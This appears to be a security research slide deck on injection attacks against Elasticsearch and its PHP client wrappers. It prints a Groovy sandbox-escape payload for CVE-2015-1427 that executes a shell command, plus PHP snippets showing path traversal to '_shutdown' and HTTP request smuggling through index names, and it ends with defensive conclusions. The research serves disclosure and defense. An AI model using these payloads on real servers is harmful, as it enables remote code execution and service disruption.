Elastic Search Injections. Wrappers are vulnerable

1. ElasticSearch:
Is it secure?
@d0znpp
Wallarm research

2. What is ElasticSearch?
“Elasticsearch is a distributed RESTful search engine
built for the cloud.“
Official repo: https://github.com/elastic/elasticsearch
Distributed Lucene instances broker
● RESTful API
● Native Java API
Clients: https://www.elastic.co/guide/index.html

3. Previous works
● NoSQL Injection for Elasticsearch Kindle Edition by
Gary Drocella http://goo.gl/OnfMOz
=> ACL to 9200 and 9300
● NoSQL Injections: Moving Beyond 'or '1'='1'. Matt
Bromiley Derbycon 2014 http://goo.gl/UBh42h
=> do not produce JSON by strings concatenation
● Securing ElasticSearch http://goo.gl/Ik3023
=> Use Nginx to provide BasicAuth and other advices

5. Previous bugs: 5 CVE
https://www.elastic.co/community/security
● CVE-2015-4165 is not disclosed yet ;(
“All Elasticsearch versions from 1.0.0 to 1.5.2 are vulnerable to
an attack that uses Elasticsearch to modify files read and
executed by certain other applications.”
● CVE-2015-3337 path trav. https://goo.gl/YWwu3a
● CVE-2015-1427 Groovy RCE https://goo.gl/Bi9SfC
● CVE-2014-6439 CORS issue https://goo.gl/7kMxod
● CVE-2014-3120 Java RCE https://goo.gl/iZL5L8

6. Sandbox bypass 1427
{
"size":1,
"script_fields":{
"lupin":{ "script":"java.lang.Math.class.forName
("java.lang.Runtime").getRuntime().exec("id").
getText()"
}
}
}

7. What is my point?
BugBounty
https://research.facebook.com/search?q=a%20 200
https://research.facebook.com/search?q=a%22 500
$1000 reward for injection into JSON to
ElasticSearch
But it might be RCE...

8. What is my point?
● Want to hack it through web-applications
● Because it’s really rare case when ES is present at
network perimeter
● To check wrappers for different platforms for input
validation attacks
● Yes, the same as with Memcached injections https:
//goo.gl/9qV620 [BHUS-14]

9. 4 popular clients (wrappers)
http://jolicode.com/blog/elasticsearch-php-clients-test-
drive
● Original (elasticsearch)
● Sherlock
● Elastica
● Nervetattoo
Let’s start from PHP

10. ● RESTful tricks (while user data at URL ../ et al.)
● JSON syntax breakers ( “ } { ] [ )
● Native Java API
● Filename tricks (each index is a folder with the
same name). I suggests that it is CVE-2015-4165
vector ;)
Input validation kinds

11. ● RESTful tricks (while user data at URL ../ et al.)
● JSON syntax breakers ( “ } { ] [ )
● Native Java API <- Only about RESTful clients now
● Filename tricks (each index is a folder with the
same name). I suggests that it is CVE-2015-4165
vector ;) <- ES internals, not clients
Input validation kinds

12. ● All URI parts goes through PHP urlencode().
But dot (0x2e) IS NOT encoded by RFC
● json_encode protects from injections into values
$params = array();
$params['body'] = array('testField' => 'abc');
$params['index'] = '..';
$params['type'] = '_shutdown';
// Document will be indexed to my_index/my_type/<autogenerated_id>
$ret = $client->index($params);
elasticsearch original

13. ● URI parts “as is”
● json_encode protects from injections into values
$results = $es
->setIndex("what/../do/you/want!/")
->setType("and/../here/also!")
->search('title:cool&key=value&script_fields');//CVE
nervetattoo

14. But it’s a raw socket, baby!
$results = $es
->setIndex(" HTTP/1.1rn…”script”:”...”") // CVE
->setType("my_type")
->search('title:cool');
nervetattoo

15. ● Use DSL methods
● Index name and type are not for users
● Do not concatenate strings to JSON
● Always filter data before putting into wrappers
Conclusions

16. https://twitter.com/d0znpp
blog.wallarm.com
Thx!